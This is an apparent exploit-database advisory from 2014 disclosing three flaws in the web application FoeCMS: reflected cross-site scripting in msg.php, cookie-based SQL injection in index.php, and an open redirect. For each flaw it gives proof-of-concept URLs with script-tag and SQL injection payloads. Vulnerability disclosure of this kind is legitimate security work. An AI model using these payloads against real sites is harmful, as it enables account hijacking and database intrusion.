################################################################################################## # #Exploit Title : FoeCMS multiple vulnerability #Author : Govind Singh aka NullPort #Vendor : http://foecms.com/ #Download Link : https://github.com/themarioga/FoeCMS/archive/master.zip #Date : 05/07/2014 #Discovered at : IHT Lab ( 1ND14N H4X0R5 T34M ) #Love to : Manish Tanwar, DeadMan India, Hardeep Singh, Amit Kumar Achina , Jitender Dangi #Greez to : All IHT Members ################################################################################################## Reflected Cross-Site Scripting :: --------------------------- Reflected Cross-Site Scripting effecting "msg.php" with variables "e" & "r" PoC : 1 with variable "e" http://localhost/FoeCMS/msg.php?e=[XSS] http://localhost/FoeCMS/msg.php?e=%3Cscript%3Ealert%28%27hello%27%29;%3C/script%3Ecms_delinstall&r=index.php&nr=1 payload : PoC : 2 with variable "r" http://localhost/FoeCMS/msg.php?e=cms_delinstall&r=[XSS] http://localhost/FoeCMS/msg.php?e=cms_delinstall&r=%27%22%3E%3Cscript%3Ealert%28%27hello%27%29;%3C/script%3E payload : '"> ---------------------------------------------------------------------------------------------------- Cookies Based Sql injection :: ------------------------- http://localhost/FoeCMS/index.php?i=[Sqli] PoC : http://localhost/FoeCMS/index.php?i=-1' order by 3--+ ---------------------------------------------------------------------------------------------------- open Redirect :: Open Redirect effecting "msg.php" with variable "r" when we set value of "r=https://scontent-a-ams.xx.fbcdn.net/hphotos-xaf1/t1.0-9/q71/s720x720/419153_136544006541776_1226726278_n.jpg" ------------------------- PoC : Open Redirect with variable "r" http://localhost/FoeCMS/msg.php?e=cms_delinstall&r=[Redirect] http://localhost/FoeCMS/msg.php?e=cms_delinstall&r=https://scontent-a-ams.xx.fbcdn.net/hphotos-xaf1/t1.0-9/q71/s720x720/419153_136544006541776_1226726278_n.jpg